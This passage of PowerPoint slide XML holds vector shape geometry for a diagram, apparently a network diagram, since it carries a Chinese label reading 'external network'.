                  <a:gd name="T97" fmla="*/ 267 h 298"/>
                  <a:gd name="T98" fmla="*/ 44 w 392"/>
                  <a:gd name="T99" fmla="*/ 248 h 298"/>
                  <a:gd name="T100" fmla="*/ 32 w 392"/>
                  <a:gd name="T101" fmla="*/ 234 h 298"/>
                  <a:gd name="T102" fmla="*/ 20 w 392"/>
                  <a:gd name="T103" fmla="*/ 211 h 298"/>
                  <a:gd name="T104" fmla="*/ 8 w 392"/>
                  <a:gd name="T105" fmla="*/ 186 h 298"/>
                  <a:gd name="T106" fmla="*/ 0 w 392"/>
                  <a:gd name="T107" fmla="*/ 159 h 298"/>
                  <a:gd name="T108" fmla="*/ 0 w 392"/>
                  <a:gd name="T109" fmla="*/ 136 h 298"/>
                  <a:gd name="T110" fmla="*/ 3 w 392"/>
                  <a:gd name="T111" fmla="*/ 111 h 298"/>
                  <a:gd name="T112" fmla="*/ 15 w 392"/>
                  <a:gd name="T113" fmla="*/ 92 h 298"/>
                  <a:gd name="T114" fmla="*/ 29 w 392"/>
                  <a:gd name="T115" fmla="*/ 81 h 298"/>
                  <a:gd name="T116" fmla="*/ 46 w 392"/>
                  <a:gd name="T117" fmla="*/ 73 h 298"/>
                  <a:gd name="T118" fmla="*/ 60 w 392"/>
                  <a:gd name="T119" fmla="*/ 61 h 298"/>
                  <a:gd name="T120" fmla="*/ 68 w 392"/>
                  <a:gd name="T121" fmla="*/ 73 h 2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2"/>
                  <a:gd name="T184" fmla="*/ 0 h 298"/>
                  <a:gd name="T185" fmla="*/ 392 w 392"/>
                  <a:gd name="T186" fmla="*/ 298 h 2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2" h="298">
                    <a:moveTo>
                      <a:pt x="48" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="58" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="256"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="207" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="298"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="275"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="261"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="6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77" name="Freeform 1106"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4226" y="1908"/>
                <a:ext cx="62" cy="86"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2 w 62"/>
                  <a:gd name="T1" fmla="*/ 50 h 86"/>
                  <a:gd name="T2" fmla="*/ 0 w 62"/>
                  <a:gd name="T3" fmla="*/ 39 h 86"/>
                  <a:gd name="T4" fmla="*/ 0 w 62"/>
                  <a:gd name="T5" fmla="*/ 28 h 86"/>
                  <a:gd name="T6" fmla="*/ 9 w 62"/>
                  <a:gd name="T7" fmla="*/ 19 h 86"/>
                  <a:gd name="T8" fmla="*/ 17 w 62"/>
                  <a:gd name="T9" fmla="*/ 11 h 86"/>
                  <a:gd name="T10" fmla="*/ 26 w 62"/>
                  <a:gd name="T11" fmla="*/ 0 h 86"/>
                  <a:gd name="T12" fmla="*/ 33 w 62"/>
                  <a:gd name="T13" fmla="*/ 0 h 86"/>
                  <a:gd name="T14" fmla="*/ 43 w 62"/>
                  <a:gd name="T15" fmla="*/ 0 h 86"/>
                  <a:gd name="T16" fmla="*/ 45 w 62"/>
                  <a:gd name="T17" fmla="*/ 11 h 86"/>
                  <a:gd name="T18" fmla="*/ 50 w 62"/>
                  <a:gd name="T19" fmla="*/ 25 h 86"/>
                  <a:gd name="T20" fmla="*/ 57 w 62"/>
                  <a:gd name="T21" fmla="*/ 36 h 86"/>
                  <a:gd name="T22" fmla="*/ 60 w 62"/>
                  <a:gd name="T23" fmla="*/ 47 h 86"/>
                  <a:gd name="T24" fmla="*/ 62 w 62"/>
                  <a:gd name="T25" fmla="*/ 58 h 86"/>
                  <a:gd name="T26" fmla="*/ 62 w 62"/>
                  <a:gd name="T27" fmla="*/ 70 h 86"/>
                  <a:gd name="T28" fmla="*/ 62 w 62"/>
                  <a:gd name="T29" fmla="*/ 81 h 86"/>
                  <a:gd name="T30" fmla="*/ 53 w 62"/>
                  <a:gd name="T31" fmla="*/ 86 h 86"/>
                  <a:gd name="T32" fmla="*/ 45 w 62"/>
                  <a:gd name="T33" fmla="*/ 86 h 86"/>
                  <a:gd name="T34" fmla="*/ 38 w 62"/>
                  <a:gd name="T35" fmla="*/ 86 h 86"/>
                  <a:gd name="T36" fmla="*/ 29 w 62"/>
                  <a:gd name="T37" fmla="*/ 86 h 86"/>
                  <a:gd name="T38" fmla="*/ 19 w 62"/>
                  <a:gd name="T39" fmla="*/ 83 h 86"/>
                  <a:gd name="T40" fmla="*/ 12 w 62"/>
                  <a:gd name="T41" fmla="*/ 75 h 86"/>
                  <a:gd name="T42" fmla="*/ 7 w 62"/>
                  <a:gd name="T43" fmla="*/ 64 h 86"/>
                  <a:gd name="T44" fmla="*/ 2 w 62"/>
                  <a:gd name="T45" fmla="*/ 53 h 86"/>
                  <a:gd name="T46" fmla="*/ 2 w 62"/>
                  <a:gd name="T47" fmla="*/ 50 h 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86"/>
                  <a:gd name="T74" fmla="*/ 62 w 62"/>
                  <a:gd name="T75" fmla="*/ 86 h 8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86">
                    <a:moveTo>
                      <a:pt x="2" y="50"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="5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78" name="Freeform 1107"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4372" y="1886"/>
                <a:ext cx="43" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 43"/>
                  <a:gd name="T1" fmla="*/ 0 h 64"/>
                  <a:gd name="T2" fmla="*/ 10 w 43"/>
                  <a:gd name="T3" fmla="*/ 8 h 64"/>
                  <a:gd name="T4" fmla="*/ 19 w 43"/>
                  <a:gd name="T5" fmla="*/ 16 h 64"/>
                  <a:gd name="T6" fmla="*/ 27 w 43"/>
                  <a:gd name="T7" fmla="*/ 16 h 64"/>
                  <a:gd name="T8" fmla="*/ 36 w 43"/>
                  <a:gd name="T9" fmla="*/ 22 h 64"/>
                  <a:gd name="T10" fmla="*/ 41 w 43"/>
                  <a:gd name="T11" fmla="*/ 36 h 64"/>
                  <a:gd name="T12" fmla="*/ 43 w 43"/>
                  <a:gd name="T13" fmla="*/ 47 h 64"/>
                  <a:gd name="T14" fmla="*/ 43 w 43"/>
                  <a:gd name="T15" fmla="*/ 55 h 64"/>
                  <a:gd name="T16" fmla="*/ 36 w 43"/>
                  <a:gd name="T17" fmla="*/ 64 h 64"/>
                  <a:gd name="T18" fmla="*/ 27 w 43"/>
                  <a:gd name="T19" fmla="*/ 64 h 64"/>
                  <a:gd name="T20" fmla="*/ 15 w 43"/>
                  <a:gd name="T21" fmla="*/ 61 h 64"/>
                  <a:gd name="T22" fmla="*/ 7 w 43"/>
                  <a:gd name="T23" fmla="*/ 53 h 64"/>
                  <a:gd name="T24" fmla="*/ 5 w 43"/>
                  <a:gd name="T25" fmla="*/ 41 h 64"/>
                  <a:gd name="T26" fmla="*/ 0 w 43"/>
                  <a:gd name="T27" fmla="*/ 30 h 64"/>
                  <a:gd name="T28" fmla="*/ 0 w 43"/>
                  <a:gd name="T29" fmla="*/ 19 h 64"/>
                  <a:gd name="T30" fmla="*/ 7 w 43"/>
                  <a:gd name="T31" fmla="*/ 8 h 64"/>
                  <a:gd name="T32" fmla="*/ 0 w 43"/>
                  <a:gd name="T33" fmla="*/ 0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64"/>
                  <a:gd name="T53" fmla="*/ 43 w 43"/>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64">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="8"/>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6366" name="Rectangle 1108"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4163" y="1964"/>
              <a:ext cx="353"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67" name="Rectangle 1109"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4214" y="2016"/>
              <a:ext cx="180"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0000"/>
                  </a:solidFill>
                  <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
                </a:rPr>
                <a:t>外部网络</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56327" name="Group 1110"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="1981200"/>
            <a:ext cx="450850" cy="525463"/>
            <a:chOff x="4803" y="1376"/>
            <a:chExt cx="284" cy="331"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56339" name="Group 1111"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4809" y="1382"/>
              <a:ext cx="278" cy="325"/>
              <a:chOff x="4809" y="1382"/>
              <a:chExt cx="278" cy="325"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="56353" name="Freeform 1112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4816" y="1550"/>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4" name="Freeform 1113"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4816" y="1550"/>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5" name="Freeform 1114"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4856" y="1382"/>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6" name="Freeform 1115"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4856" y="1382"/>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7" name="Rectangle 1116"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4856" y="1404"/>
                <a:ext cx="185" cy="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58" name="Rectangle 1117"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4818" y="1580"/>
                <a:ext cx="261" cy="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59" name="Rectangle 1118"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4873" y="1423"/>
                <a:ext cx="151" cy="1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60" name="Line 1119"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4996" y="1608"/>
                <a:ext cx="62"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6361" name="Group 1120"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4809" y="1659"/>
                <a:ext cx="278" cy="48"/>
                <a:chOff x="4809" y="1659"/>
                <a:chExt cx="278" cy="48"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="56362" name="Freeform 1121"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4809" y="1659"/>
                  <a:ext cx="278" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 278"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 33 w 278"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 246 w 278"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 278 w 278"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 278"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 278"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 278 w 278"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="278" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="3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63" name="Freeform 1122"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4809" y="1659"/>
                  <a:ext cx="278" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 278"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 33 w 278"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 246 w 278"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 278 w 278"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 278"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 278"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 278 w 278"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="278" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="33" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="278" y="3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64" name="Rectangle 1123"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4811" y="1693"/>
                  <a:ext cx="27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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="56340" name="Group 1124"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4803" y="1376"/>
              <a:ext cx="277" cy="325"/>
              <a:chOff x="4803" y="1376"/>
              <a:chExt cx="277" cy="325"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
